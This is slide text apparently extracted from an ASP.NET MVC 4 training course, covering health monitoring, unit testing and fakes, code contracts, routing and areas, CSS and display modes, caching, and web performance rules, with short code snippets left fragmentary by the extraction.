WmiWebEventProvider
Writes to WMI
SimpleMailWebEventProvider
TemplatedMailWebEventProvider
Sends an e-mail message
TraceWebEventProvider
Writes to the ASP.NET Trace
Providers are not configured and do not subscribe to
any events by default
Except EventLogWebEventProvider, which is configured to write
exceptions and failed security audits to event log
Health Monitoring
6. 11
Configuring
Configured in the <healthMonitoring> section
<healthMonitoring heartBeatInterval="5" enabled="true">
<providers>
Configure which providers are available and where they
will write to
<bufferModes>
Configure how providers are buffered so that they are
transmitted in batches to avoid overloading the system
<eventMappings>
Associates event names (such as All Errors and Failure
Audits) with the classes that implement them
<rules>
Maps event types with event providers
<profiles>
Configure how many events can occur within a specific
time limit
minInterval
Before another event is logged (non-critical use higher values)
Health Monitoring
6. 12
Custom Extensions
Create custom extensions with IWebEventCustomEvaluator
Allows enabling or disabling the firing of a specific event
Especially useful when you implement your own custom event and
want to control the rate at which it is sent to the related provider
for processing
using System.Web.Management;
public class SampleWebBaseEvent : WebBaseEvent, IWebEventCustomEvaluator
{
public bool CanFire(WebBaseEvent e, RuleFiringRecord rule)
{
// return true when you want your rule to fire
IWebEventCustomEvaluator Interface
http://msdn.microsoft.com/en-us/library/system.web.management.iwebeventcustomevaluator.aspx
6. 13
Testing
Types of Tests
Test Level
Description
Unit
AKA component testing, refers to tests that verify the functionality
of a specific section of code, usually at the function level. In an
object-oriented environment, this is usually at the class level, and
the minimal unit tests include the constructors and destructors.
Integration
Any type of software testing that seeks to verify the interfaces
between components against a software design
System
Tests a completely integrated system to verify that it meets its
requirements
Acceptance
The system is delivered to the user for Acceptance testing
Regression
Finding defects after a major code change has occurred
Performance
Executed to determine how a system or sub-system performs in
terms of responsiveness and stability under a particular workload
Load
Testing the system can continue to operate under a specific load,
whether that be large quantities of data or a large number of users
Stress
Test reliability under unexpected or rare workloads
Testing
6. 14
Unit Testing Overview
Developers are responsible for testing their code prior
to alpha or beta releases
Informal process, includes walking through the code line by line
using a test harness used to simulate standard user interaction
Formal process, uses a Unit Test that isolates the code to be
tested and tests all conditions of that unit, which can be:
Manual, documented and executed by the developer
Automated, test code that used to exercise a portion of
application code
Unit Testing Limits:
Helps ensure that each unit of code works as intended
Does not cover integration, UI, load, or performance
Testing
6. 15
Writing a Unit Test for MS Test
Write the test method to initialize appropriate values,
call the method, and then make assertions
[TestMethod]
public void AddNumbersTest()
{
var target = new CalculatorEngine(); // ARRANGE
int a = 2;
int b = 3;
int expected = 5;
int actual;
actual = target.AddNumbers(a, b); // ACT
Assert.AreEqual(expected, actual); // ASSERT
}
public class CalculatorEngine
{
public int AddNumbers(int a, int b)
{
return a * b;
}
}
Testing
6. 16
Unit Testing MVC
Unit tests are easy to create
[TestMethod]
public void TestDetailsView() {
var controller = new ProductController();
To test that the correct view is being chosen
var result = controller.Details(2) as ViewResult;
Assert.AreEqual("Details", result.ViewName);
To test that the correct model is being passed
var product = (Product)result.ViewData.Model;
Assert.AreEqual("Laptop", product.Name);
Creating Unit Tests for ASP.NET MVC Applications
http://www.asp.net/mvc/tutorials/creating-unit-tests-for-asp-net-mvc-applications-cs
Testing
6. 17
Assert Class
Fail, Inconclusive, IsTrue, IsFalse, IsNull, IsNotNull,
IsInstanceOfType, IsNotInstanceOfType
The Assert class throws an AssertFailedException to signal a
failure which should not be captured because it is handled by
the unit test engine to indicate an assert failure
AreEqual / AreNotEqual
The two parameters have equivalence (internally uses Equals)
Assert.AreEqual(expected, actual);
Do NOT call Equals directly; this method is inherited from
Object and is not designed for use with unit testing
AreSame / AreNotSame
The two parameters (expected, actual) refer to the same object
Assert Class
http://msdn.microsoft.com/en-us/library/microsoft.visualstudio.testtools.unittesting.assert.aspx
Testing
6. 18
Microsoft Fakes Framework
Uses stubs and shims to let you easily isolate
components under test from the environment
They are small pieces of code that take the place of another
component during testing
Many methods return different results dependent on external
conditions, but a stub or shim is under the control of your test
and can return consistent results at every call, and you can run
tests even if the other components are not working yet
Testing
6. 19
Techniques for Removing Dependencies (Stub)
If you control the code, you should define interfaces
for any components you have dependencies on
public interface ICalculator {
public int Add(int a, int b);
public class RealCalc : ICalculator {
public int Add(int a, int b) {
In tests, create a fake that implements the same
interface and make it return consistent results
public class FakeCalc : ICalculator {
public int Add(int a, int b) {
var dependency = new FakeCalc();
var result = dependency.Add(2, 3);
Testing
6. 20
Techniques for Removing Dependencies (Shim)
If you dont control the code and it doesnt implement
an interface
public class RealCalc {
public int Add(int a, int b) {
Create a fake and a delegate with the same signature
as the method you need to call
public class FakeCalc {
public int Add(int a, int b) {
var dependency = new FakeCalc();
var delegateToAdd = new Func<int, int, int>(dependency.Add);
var result = delegateToAdd(2, 3);
10
6. 21
Testing
Stub and Shim Types
To use stubs, your application has to be designed so
that the different components are not dependent on
each other, but only dependent on interface definitions
Use shims to isolate your code from assemblies that
are not part of your solution
Shim types provide a mechanism to detour any .NET method to
a user defined delegate
Shim types are code-generated by the Fakes generator, and
they use delegates, which we call shim types, to specify the
new method implementations
Shim class names are made up by prefixing Fakes.Shim to the
original type name
Using stubs to isolate your application from other assemblies for unit testing
http://msdn.microsoft.com/en-us/library/hh549174.aspx
Using shims to isolate your application from other assemblies for unit testing
http://msdn.microsoft.com/en-us/library/hh549176.aspx
6. 22
Testing
Autofac FakeItEasy and Ninject
Given you have a system under test and a dependency
public class SystemUnderTest {
private IDependency DependentObject { get; private set; }
public SystemUnderTest(IDependency dependency) {
this.DependentObject = dependency;
}
public interface IDependency {
}
You can create your system under test with a fake
dependency automatically injected
[TestMethod]
public void Test()
{
using (var fake = new AutoFake()) {
// injects a fake IDependency into the SystemUnderTest constructor
var sut = fake.Create<SystemUnderTest>();
FakeItEasy
Ninject
http://code.google.com/p/autofac/wiki/FakeItEasy
http://www.ninject.org/
11
6. 23
System.Diagnostics.Contracts
What are Code Contracts?
using System.Diagnostics.Contracts;
Contracts allow you to express preconditions,
postconditions and object invariants in your code for
runtime checking, static analysis, and documentation
For example, you might have a Rational class to
represent rational numbers
For a rational number, the denominator must be non-zero
We can define a pre-condition to test for this in the constructor
public class Rational {
public Rational(int numerator, int denominator) {
Contract.Requires(denominator != 0);
To use it you will need to follow links below:
Code Contracts User Manual
http://research.microsoft.com/en-us/projects/contracts/userdoc.pdf
Code Contracts for .NET
http://visualstudiogallery.msdn.microsoft.com/1ec7db13-3363-46c9-851f-1ce455f66970
System.Diagnostics.Contracts
6. 24
Contract Class
Assume(bool, string) method
Instructs code analysis tools to assume that a condition is true,
even if it cannot be statically proven to always be true, and
displays a message if the assumption fails
Ensures(bool) method
Specifies a postcondition contract for the enclosing method or
property
Requires<TException>(bool, string) method
Specifies a precondition contract for the enclosing method or
property, and throws an exception with the provided message if
the condition for the contract fails
Contract Class
http://msdn.microsoft.com/en-us/library/system.diagnostics.contracts.contract(v=vs.110).aspx
12
7. 1
Module 7
Structuring ASP.NET MVC 4
Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Structuring ASP.NET MVC 4 Web Applications
7. 2
Contents
Topic
Slide
SEO
Routing
MVC Areas
15
Exam Topic: Design and implement routes
Define a route to handle a URL pattern
Apply route constraints
Ignore URL patterns
Add custom route parameters
Define areas
Page 07-10 (position 9, 4284)
The MOC says to use MapHttpRoute
It should have said to use MapRoute
Note: MVC Site Map Provider is not an official component of
Visual Studio 2012 and ASP.NET 4.5 so it is NOT on the exam
SEO
7. 3
Search Engine Optimization
SEO Strategies
HTML
URLs
Anti-patterns
Improve the volume and quality of traffic to your
website from search engines
Control how search engines access and display web
content
Inform search engines about locations that are
available for indexing
SEO
7. 4
IIS SEO Toolkit
Site Analysis
Optimizes content, structure, and URLs for search engine
crawlers
Discovers problems that impact the user experience of website
Robot Exclusion
Manage all robots.txt files from within IIS Manager
Modify robots.txt files from a GUI interface
Sitemap and Site Index
Manage all sitemap files from within IIS Manager
Modify sitemap.xml files from a GUI interface
7. 5
Routing
Three Technologies Can Define Routes
routes.MapRoute(
MVC
name: "Default",
url: "{controller}/{action}/{id}",
defaults: new { controller = "Home", action = "Index",
id = UrlParameter.Optional }
);
config.Routes.MapHttpRoute(
name: "DefaultApi",
routeTemplate: "api/{controller}/{id}",
defaults: new { id = RouteParameter.Optional }
);
routes.MapPageRoute(
routeName: "LoginRoute",
routeUrl: "account/login",
physicalFile: "~/login.aspx"
);
Default Route
Web API Default Route
Web Forms Custom Route
Routing
7. 6
Using the Default Route
The default MVC route
routes.MapRoute("Default", // route name
"{controller}/{action}/{id}", // URL pattern with route parameters
new { // route parameter defaults
controller = "Home", action = "Index",
id = UrlParameter.Optional }
);
Maps this HTTP request to the following parameters
GET http://www.contoso.com/Home/Index/3
{controller} = Home, {action} = Index, {id} = 3
So this method is executed on the controller
return (new HomeController()).Index(3);
ASP.NET MVC Routing Overview
http://www.asp.net/mvc/tutorials/asp-net-mvc-routing-overview-cs
7. 7
Routing
Action Method Parameters
The controller can define the Index method like this
public ActionResult Index(string id)
Or like this
public ActionResult Index()
Note: the id is available using RouteData.Value["id"]
But if the action method is defined like this
public ActionResult Index(int id)
an exception is thrown if the parameter is missing
To avoid an exception use int? or set a default value
public ActionResult Index(int? id)
public ActionResult Index(int id = 0)
7. 8
Routing
URL Patterns
Route definition
Example of matching URL
{controller}/{action}/{id}
/Products/show/beverages
{resource}.axd/{*pathInfo}
/WebResource.axd?d=123456...
{table}/Details.aspx
/Products/Details.aspx
blog/{action}/{entry}
/blog/show/123
{reporttype}/{year}/{month}/{day}
/sales/2008/1/5
{locale}/{action}
/US/show
{language}-{country}/{action}
/en-US/show
Route definition (IIS 6.0)
Example of matching URL
{controller}.mvc/{action}/{id}
/Products.mvc/show/beverages
ASP.NET Routing
http://msdn.microsoft.com/en-us/library/cc668201.aspx
7. 9
Routing
Variable Number of Segments
Route path that matches variable number of segments
query/{queryname}/{*queryvalues}
URL
Parameters
/query/select/bikes/onsale
queryname = "select"
queryvalues = "bikes/onsale"
/query/select/bikes
queryname = "select"
queryvalues = "bikes"
/query/select
queryname = "select"
queryvalues = null
*queryvalues segment can be missing from a URL path without
needing to mark it as optional
You can only have one segment marked with * and it must be
the last segment
Routing
7. 10
Constraints
Routes can use constraints to differentiate
Without the constraint the first route would match both samples
routes.MapRoute(name: "ProductByIntegerRoute",
url: "product/{id}", // product/23
defaults: new { controller = "Product", action = "Details" },
constraints: new { id = "^\d{1,}$" }
);
routes.MapRoute(name: "ProductByStringRoute",
url: "product/{name}", // product/apple
defaults: new { controller = "Product", action = "DetailsByName" }
);
public ActionResult Details(int id)
public ActionResult DetailsByName(string name)
Routing
7. 11
Scenarios When Routing Is Not Applied
Physical file matches
By default, routing does not handle requests that map to an
existing physical file on the Web server
Override the default behavior by setting the RouteExistingFiles
property of the RouteCollection object to true
Routing explicitly disabled for a URL pattern
Define a route and specify that the StopRoutingHandler class
should be used to handle that pattern
Use the RouteCollection.Ignore method (or the extension
method RouteCollectionExtensions.IgnoreRoute) to create
routes that use the StopRoutingHandler class
routes.Ignore("{resource}.axd/{*pathInfo}");
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
Difference between RouteCollection.Ignore and RouteCollection.IgnoreRoute?
http://stackoverflow.com/questions/11544338/difference-between-routecollection-ignore-and-routecollection-ignoreroute
Routing
7. 12
How URLs are Matched to Routes
Matching a URL request to a route depends on all the
following conditions
The route patterns that you have defined or the default route
The order in which you added them to the Routes collection
Any default values that you have provided for a route
Any constraints that you have provided for a route
Whether you have defined routing to handle requests that
match a physical file
Route matching is tried from the first route to the last
route in the collection
When a match occurs, no more routes are evaluated
Routing
7. 13
Custom Route Handler
Create a custom route handler to perform additional
checks, for example, by country
Create a class that implements IRouteHandler
public class CountryProhibitionRouteHandler : IRouteHandler
The method GetHttpHandler must return IHttpHandler and
accept a single input parameter of type RequestContext
public IHttpHandler GetHttpHandler(RequestContext context)
Inherit from MvcHandler (which implements IHttpHandler)
public class IpBlockHandler : MvcHandler
IRouteHandler in ASP.NET MVC
http://keyvan.io/iroutehandler-in-asp-net-mvc
Routing
7. 14
IIS URL Rewrite Module
IIS admins can create rules to map URLs
For SEO, to perform redirects, based on HTTP headers or server
variables (like IP addresses), stop requests, control access
URL rewriting differs from ASP.NET routing
URL rewriting processes incoming requests by actually changing
the URL before it sends the request to the Web page
URL rewriting typically does not have an API for creating URLs
that are based on your patterns so if you change a pattern, you
must manually update all hyperlinks that contain the original
With ASP.NET routing, the URL is not changed, because routing
can extract values from the URL
When you have to create a URL, you pass parameter values into
a method that generates the URL for you
Using the URL Rewrite Module
http://learn.iis.net/page.aspx/460/using-the-url-rewrite-module/
MVC Areas
7. 15
What are Areas?
The default ASP.NET MVC project structure can become
unwieldy so MVC lets you partition Web applications
into smaller units that are referred to as areas
An area is effectively an MVC structure inside an application
Right-click an MVC project and choose Add-Area...
MVC Areas
7. 16
Area Registration
When you add an area to a project, a route for the
area is defined in an AreaRegistration file
The route sends requests to the area based on the
request URL
To register routes for areas, you add code to the
Global.asax file that can automatically find the area
routes in the AreaRegistration file
AreaRegistration.RegisterAllAreas();
This is done automatically by Visual Studio
Organizing an ASP.NET MVC Application using Areas
http://msdn.microsoft.com/en-us/library/ee671793.aspx
MVC Areas
7. 17
Linking Between Areas
Html.ActionLink helper method
This will work inside an area
@Html.ActionLink("Show Blog", "ShowBlog", "Blog")
Outside the area we must also pass a routeValues instance (an
anonymous type with an "area" property with value of the area
name) and optionally any HTML attributes to set (usually null)
@Html.ActionLink("Show Blog", "ShowBlog", "Blog",
new { area = "hr" }, null)
To create a link inside an area to go back outside the area
@Html.ActionLink("Home Page", "Index", "Home",
new { area = "" }, null)
MVC Areas
7. 18
Controllers with Same Name
By default, controllers must have
unique names within an MVC project,
even with multiple areas
To reuse a controller name in an area you
must specify the root namespace when
registering the default route by passing an
array of string
routes.MapRoute("Default", // Route name
"{controller}/{action}/{id}", // URL
new { controller = "Home", action = "Index", id = "" }, // Defaults
new[] { "AreasDemoWeb.Controllers" } // Namespace
);
8. 1
Module 8
Applying Styles to ASP.NET
MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Applying Styles to ASP.NET MVC 4 Web Applications
8. 2
Contents
Topic
Slide
CSS Printing
CSS Media Queries
Display Modes
Browsers
Exam Topic: Plan an adaptive UI layout
Plan for running applications in browsers on multiple
devices (screen resolution, CSS, HTML)
Plan for mobile web applications
Exam Topic: Enhance application behavior and style
based on browser detection
Detect browser features and capabilities
Create a web application that runs across multiple
browsers and mobile devices
Vendor-specific CSS extensions
Exam Topic: Apply the user interface design for a web application
Create and apply styles by using CSS
Structure and lay out the user interface by using HTML
Implement dynamic page content based on a design
Exam Topic: Compose the UI layout of an application
Design layouts to provide visual structure
Implement master/application pages
8. 3
CSS
Printing
style and link elements support the MEDIA attribute,
which defines the output device for the style sheet
Values for MEDIA are screen (default), print and all
The print value specifies that the style sheet is used when the
page is printed; this value does not affect how the document
will be displayed onscreen
<style type="text/css" media="print">
div.page {
page-break-before: always;
}
</style>
Printing and Style Sheets
http://msdn.microsoft.com/en-us/library/ms530709(v=vs.85).aspx
CSS
8. 4
Media Queries
Media queries allow you to have different style sheets
for different scenarios
<link rel='stylesheet'
media='only screen and (max-width: 700px)'
href='css/narrow.css' />
<link rel='stylesheet'
media='only screen and (min-width: 701px) and (max-width: 900px)'
href='css/medium.css' />
The keyword only can also be used to hide style sheets from
older user agents. User agents must process media queries
starting with only as if the only keyword was not present.
What is the difference between screen and only screen in media queries?
http://stackoverflow.com/questions/8549529/what-is-the-difference-between-screen-and-only-screen-in-media-queries
CSS Media Queries & Using Available Space
http://css-tricks.com/css-media-queries/
Display Modes
8. 5
Using and Registering Display Modes
By default ASP.NET registers a (default) and a
mobile display mode
You can also create your own for more advanced customization
This creates a new display mode (inserted at the top of the
existing list) that will activate when the text iPhone is found
in the requests user-agent
using System.Web.WebPages;
DisplayModeProvider.Instance.Modes.Insert(0,
new DefaultDisplayMode("iPhone") { ContextCondition =
(ctx => ctx.Request.UserAgent.IndexOf("iPhone",
StringComparison.OrdinalIgnoreCase) >= 0) });
You can then create specific views for this type of device by
giving them names such as xyz.iphone.cshtml
DisplayModes in MVC 4
http://www.campusmvp.net/blog/displaymodes-in-mvc-4
ASP.NET MVC 4 (Part 2 - Mobile Features)
http://build-failed.blogspot.co.uk/2012/03/aspnet-mvc-4-part-2-mobile-features.html
Display Modes
8. 6
Testing Display Modes
To test the mobile option, hit F12 and bring up the
Developers Tools window
Set a fake user agent that matches a mobile device
Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko)
In spite of a misleading name, the DefaultDisplayMode
class is just the class that represents a display mode
Heres how Microsofts one for mobile is written
var mode = new DefaultDisplayMode(MobileDisplayModeId)
{
ContextCondition =
context => context.GetOverriddenBrowser().IsMobileDevice
};
Multiple Views and DisplayMode Providers in ASP.NET MVC 4
https://www.simple-talk.com/dotnet/asp.net/multiple-views-and-displaymode-providers-in-asp.net-mvc-4/
Browsers
8. 7
Determining the Browser Type
Not all browsers render HTML identically
To generate different versions of a page for different
browsers we need to know capabilities of a browser
Request.Browser (HttpBrowserCapabilities) properties
Read the strongly-typed property or the string-keyed collection
var cookiesSupported = Request.Browser.Cookies;
// or Request.Browser["Cookies"]
Cast to MobileCapabilities to get more details if the browser is
running on a mobile device
var mobile = Request.Browser.IsMobileDevice;
// (Request.Browser as MobileCapabilities)
Warning! Capabilities indicate support for a feature, not if that
feature is currently enabled, for example, Cookies
Browsers
8. 8
How Browser Capabilities are Defined
Microsoft supplies definition files for most browsers
\WINDOWS\Microsoft.NET\Framework\v4.0.30319\
CONFIG\Browsers
These files are compiled and deployed to the GAC to improve
performance, so if you add or modify you must re-register
aspnet_regbrowsers.exe -i
For a specific web application you can create browser
definition files in a special sub-folder
App_Browsers
<browserCaps> element in Web.config is obsolete
9. 1
Module 9
Building Responsive Pages in
ASP.NET MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Building Responsive Pages in ASP.NET MVC 4 Web Applications
9. 2
Contents
Topic
Slide
Partial Page Updates
Caching Overview
System.Web.Caching
System.Runtime.Caching
OutputCache
11
Caching Configuration
13
Performance
14
Exam Topic: Design a caching strategy
Implement page output caching (performance oriented)
Implement data caching
Implement HTTP caching
Exam Topic: Design and implement UI behavior
Use AJAX to make partial page updates
Partial Page Updates
9. 3
Ajax.ActionLink
MOC code on page 09-4
Unnecessary to add [HttpGet]
MOC code on page 09-5
@Ajax.ActionLink("Refresh", "HelloWorld", new AjaxOptions {
HttpMethod = "POST", UpdateTargetId = "divMessage",
InsertionMode = InsertionMode.Replace })
Use HttpMethod = "POST" to ensure the response isnt cached
(GET would work only once!)
InsertionMode: Replace, InsertBefore, InsertAfter
NOTE: when using the Basic template, add jqueryval bundle
to bottom of _Layout.cshtml or the code wont work
@Scripts.Render("~/bundles/jqueryval")
AjaxOptions Class
http://msdn.microsoft.com/en-us/library/system.web.mvc.ajax.ajaxoptions(v=vs.108).aspx
Caching Overview
9. 4
Types of Caching
Caching stores frequently accessed data in memory
where it can be retrieved faster than it could be from a
file or database
ASP.NET MVC needs two types of caching
Model caching (Cache or MemoryCache)
Cache and MemoryCache objects are dictionaries that can store
any object in server memory and automatically remove it based
on memory limitations, time limits, or other dependencies
View caching (OutputCache, Response.Cache)
OutputCache is an attribute that can cache an ActionResult on
the server (or browser or intermediaries) to avoid needing to
call that action method for future requests (for a duration)
Response.Cache controls where HTTP GET responses can be
cached (server, intermediaries, browser)
9. 5
System.Web.Caching
How to Store Objects in the Cache
using System.Web.Caching;
Assignment
Assigns a value to an unused key or replaces existing value
HttpContext.Current.Cache["Greeting"] = "Hello, world!";
Insert method (overloaded), replaces if duplicate key
Provides (optional) parameters to customize items in the cache
HttpContext.Current.Cache.Insert("Greeting", "Hello, world!");
Add method, throws exception if duplicate key
Requires all parameters to be specified
HttpContext.Current.Cache.Add("Greeting", "Hello, world!",
null,
DateTime.Now.AddSeconds(60), Cache.NoSlidingExpiration,
CacheItemPriority.High, onRemoveCallback);
System.Web.Caching
9. 6
Cache Insert and Add Methods Parameters
key
The identifier used to access the cached data
value
The data to cache
dependencies
A CacheDependency object that references a file, other
object in the cache, or database command used to track
changes to data outside of the cache
absoluteExpiration
A DateTime or Cache.NoAbsoluteExpiration when using
sliding expiration
slidingExpiration
A TimeSpan that identifies how long the data should remain
in the cache after the data was last accessed or
Cache.NoSlidingExpiration when using absolute expiration
priority
A CacheItemPriority enumeration value identifying the
relative priority of the cached data (Low, BelowNormal,
Normal, AboveNormal, High, NotRemovable*)
onRemoveCallback
A delegate to call when the data is removed from the cache;
CacheItemRemovedReason: Removed, Expired, Underused,
DependencyChanged
*NotRemovable means that Microsoft's algorithm will not remove such an item when you get low
on memory, but that it can expire or be removed by a dependency
9. 7
System.Web.Caching
Defining a Cache Dependency
To create a file dependency
using System.Web.Caching;
var dep1 = new CacheDependency(Server.MapPath("products.xml"));
To create an object dependency
string[] keyDeps = { "CachedObject1", "CachedObject2" };
var dep2 = new CacheDependency(null, keyDeps);
To create an SQL dependency
var dep3 = new SqlCacheDependency("Northwind", "Products");
To cache an object with one of the above dependencies
HttpContext.Current.Cache.Insert(
"CachedProducts", service.GetProducts(), dep3);
9. 8
System.Web.Caching
SqlCacheDependency
Modify the web.config
using System.Web.Caching;
<caching>
<sqlCacheDependency enabled="true" pollTime="30000">
<databases>
<add name="Northwind" connectionStringName="NorthwindConnection"/>
Activate the SqlCacheDependency in the Global.asax
SqlCacheDependencyAdmin.EnableNotifications(connectionString);
SqlCacheDependencyAdmin.EnableTableForNotifications(
connectionString, "Products");
Enable cache dependencies on the table
aspnet_regsql.exe -S [YOURSERVER] -U [USERNAME] -P [PASSWORD]
-ed -d [DATABASE] -et -t [TABLENAME]
Activate ASP.NET MVC3 Caching with Database Dependency
http://sdeu.wordpress.com/2011/02/08/activate-asp-net-mvc3-caching-with-database-dependency/
9. 9
System.Runtime.Caching
What Is the MemoryCache?
Introduced in .NET 4, it is similar to the Cache
Moved out of ASP.NET so it can be used by other .NET apps
Supports multiple instances, as well as a Default instance
using System.Runtime.Caching;
var policy = new CacheItemPolicy
{ SlidingExpiration = TimeSpan.FromHours(2) };
MemoryCache.Default.Set("MyCustomers", service.GetCustomers(),
policy, null); // last parameter is region (not supported)
var cachedObject = MemoryCache.Default.Get("MyCustomers");
if (cachedObject != null)
Although it is not a singleton, avoid creating too many
instances, and use Default when possible
MemoryCache.Set Method (String, Object, CacheItemPolicy, String)
http://msdn.microsoft.com/en-us/library/ee395903(v=vs.110).aspx
9. 10
System.Runtime.Caching
What Is AddOrGetExisting Used For?
It is NOT used to either get or reload an existing cached
object, as incorrectly explained in the MOC
var cachedObject = MemoryCache.Default.AddOrGetExisting(
"MyCustomers", service.GetCustomers(), policy, null);
There are often situations where you only want to create a
cache entry if a matching entry doesnt already exist (that is,
you don't want to overwrite an existing value)
Get("foo")
Get("foo")
Set("foo", "something")
Thread 2
Thread 1
Without AddOrGetExisting it would be impossible to perform the
get-test-set in an atomic, thread-safe manner
Set("foo", "something else")
MemoryCache.AddOrGetExisting
http://stackoverflow.com/questions/14698228/what-is-memorycache-addorgetexisting-for
System.Runtime.Caching
9. 11
CacheItemPolicy
Represents a set of eviction and expiration details for a
specific cache entry
AbsoluteExpiration: DateTime
SlidingExpiration: TimeSpan
Priority: Default, NotRemovable
ChangeMonitors: CacheEntryChangeMonitor,
HostFileChangeMonitor, SqlChangeMonitor
UpdateCallback: before object is removed
RemovedCallback: after object is removed
CacheEntryUpdateArguments Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.cacheentryupdatearguments(v=vs.110).aspx
ChangeMonitor Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.changemonitor(v=vs.110).aspx
CacheItemPolicy Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.cacheitempolicy(v=vs.110).aspx
OutputCache
9. 12
OutputCache Attribute
Cache the view of an action method for 15 seconds
Each route gets its own copy of the cached view
/Product/Detail/1
[OutputCache(Duration = 15)]
/Product/Detail/2
public ActionResult Detail(int id = 0) {
ViewBag.Message = "Page was cached at " + DateTime.Now;
return View(GetProduct(id));
If you need to store multiple copies per query string or form
parameter, use VaryByParam
[OutputCache(Duration = 15, VaryByParam = "colour")]
public ActionResult Detail(int id = 0) {
ViewBag.Message = "Page was cached at " + DateTime.Now;
return View(GetProductByColour(id, colour));
@OutputCache with Web Forms caches different pages for each
browser; in MVC you must explicitly switch this feature on
[OutputCache(Duration = 15, VaryByCustom = "browser")]
9. 13
OutputCache
Configuring Caching
Duration (required)
The number of seconds to cache the page
VaryByParam
A semicolon-separated list used to vary the output cache that
correspond to a query string or post value or use *
Location
OutputCacheLocation enumeration: Any (default), Client,
Downstream, Server, None, or ServerAndClient
CacheProfile
Name of a profile defined in Web.config
NoStore
If true, prevents secondary storage of sensitive information
SqlDependency
A set of database and table name pairs that cache depends on
VaryByCustom
If a custom string is entered, override the GetVaryByCustomString
method in the Global.asax file; browser is built-in
VaryByHeader
A semicolon-separated list of HTTP headers
VaryByContentEncoding
A comma-delimited set of character sets (content encodings) used
to vary the cache entry
[OutputCache(Duration = 3600, SqlDependency = "Northwind:Products")]
public ActionResult Index() // cache for one hour unless table changes
OutputCacheAttribute Class
http://msdn.microsoft.com/en-us/library/system.web.mvc.outputcacheattribute.aspx
Caching Configuration
9. 14
Configuring Caching for an Entire Site
Define cache profile in Web.config
Reference the profile in @OutputCache directives (Web Forms)
or OutputCache attributes (MVC)
<caching>
<outputCacheSettings>
<outputCacheProfiles>
<add name="OneMinuteProfile" enabled="true" duration="60" />
</outputCacheProfiles>
</outputCacheSettings>
<cache percentagePhysicalMemoryUsedLimit="90" />
<sqlCacheDependency enabled="true" pollTime="90">
<databases>
<add ... />
pollTime is only necessary for SQL Server 7.0 and 2000
The query notification mechanism of SQL Server 2005 detects
changes to data that invalidate the results of an SQL query and
removes any cached items associated with the SQL query
Downstream Caching
9. 15
Response.Cache Location
Use SetCacheability(HttpCacheability) to control
caching in intermediaries and browsers
Response.Cache.SetCacheability(HttpCacheability.Public);
NoCache, Server,
ServerAndNoCache
Sets the Cache-Control: no-cache header. With a field name, the
directive applies only to the named field; the rest of the response may
be supplied from a shared cache. Server or ServerAndNoCache specify
that the response is cached only at the origin server. NoCache or
ServerAndNoCache specify that the Expires HTTP header is set to -1.
This tells the client to not cache responses in the History folder. So
each time you use the back/forward buttons, the client requests a new
version of the response.
Private
Sets Cache-Control: private to specify that the response is cacheable
only on the client
Public
Sets Cache-Control: public
ServerAndPrivate
Proxy servers are not allowed to cache the response
HttpCacheability Enumeration
http://msdn.microsoft.com/en-us/library/system.web.httpcacheability(v=vs.110).aspx
Downstream Caching
9. 16
Response.Cache Browser History
You can control if a response is shown in history
Makes the response available in the browser History cache,
regardless of the HttpCacheability setting made on the server
Response.Cache.SetAllowResponseInBrowserHistory(true);
When HttpCacheability is set to NoCache or ServerAndNoCache
the Expires HTTP header is by default set to -1
You can override this behavior by calling
SetAllowResponseInBrowserHistory as above
If HttpCacheability is set to values other than NoCache or
ServerAndNoCache, then SetAllowResponseInBrowserHistory has
no effect
HttpCachePolicy.SetAllowResponseInBrowserHistory Method
http://msdn.microsoft.com/en-us/library/system.web.httpcachepolicy.setallowresponseinbrowserhistory(v=vs.110).aspx
9. 17
Downstream Caching
Response.Cache Expiry
You can control how long responses get cached
Sets the Expires HTTP header to an absolute date and time
Response.Cache.SetExpires(DateTime.Parse("6:00:00PM"));
// expire in one minute
Response.Cache.SetExpires(DateTime.Now.AddMinutes(1.0));
When cache expiration is set to sliding, the Cache-Control HTTP
header will be renewed with each response
Response.Cache.SetSlidingExpiration(true);
Set the Max-age HTTP header to a sliding timespan
Response.Cache.SetMaxAge(TimeSpan.FromMinutes(30));
HttpCachePolicy.SetExpires Method
http://msdn.microsoft.com/en-us/library/system.web.httpcachepolicy.setexpires(v=vs.110).aspx
9. 18
Performance
YSlow
YSlow analyzes web pages and suggests ways to
improve their performance based on a set of rules for
high performance web pages
Top Twelve Rules
1. Minimize HTTP Requests
7. Put Scripts at the Bottom
2. Use a Content Delivery Network
8. Avoid CSS Expressions
3. Avoid empty src or href
9. Make JavaScript and CSS
External
4. Add an Expires or
a Cache-Control Header
10. Reduce DNS Lookups
5. Gzip Components
11. Minify JavaScript and CSS
6. Put StyleSheets at the Top
12. Avoid Redirects
YSlow
http://developer.yahoo.com/yslow/
Performance
9. 19
1. Minimize HTTP Requests
This is the Performance Golden Rule because 80-90% of
the end-user response time is spent on the front-end
Most of this time is tied up in downloading all the components
in the page: images, stylesheets, scripts, and so on
Reducing the number of components reduces the number of
HTTP requests required to render the page
The easiest way to achieve this for styles and scripts
with ASP.NET MVC is to use bundling (next module)
CSS Sprites are the preferred method for reducing the
number of image requests
CSS Sprites
http://alistapart.com/article/sprites
Performance
9. 20
2. Use a Content Delivery Network (CDN)
The users proximity to your web server has an impact
on response times
Deploying your content across multiple, geographically
dispersed servers will make your pages load faster from the
user's perspective
When a URLs protocol is omitted, the browser uses the
underlying documents protocol instead
This protocol-less URL is the best way to reference third party
content thats available via both HTTP and HTTPS
//ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
Cripple the Google CDNs caching with a single character
http://encosia.com/cripple-the-google-cdns-caching-with-a-single-character/
10
9. 21
Performance
3. Avoid Empty Image src
The effect of having empty image src
<img src="">
var img = new Image();
img.src = "";
Internet Explorer makes a request to the directory in which the
page is located
Safari and Chrome make a request to the actual page itself
Even though the image request does not return an
image, all of the headers are read and accepted by the
browser, including all cookies
Similarly for script and link
<script src="">
<link href="">
Empty image src can destroy your site
http://www.nczonline.net/blog/2009/11/30/empty-image-src-can-destroy-your-site/
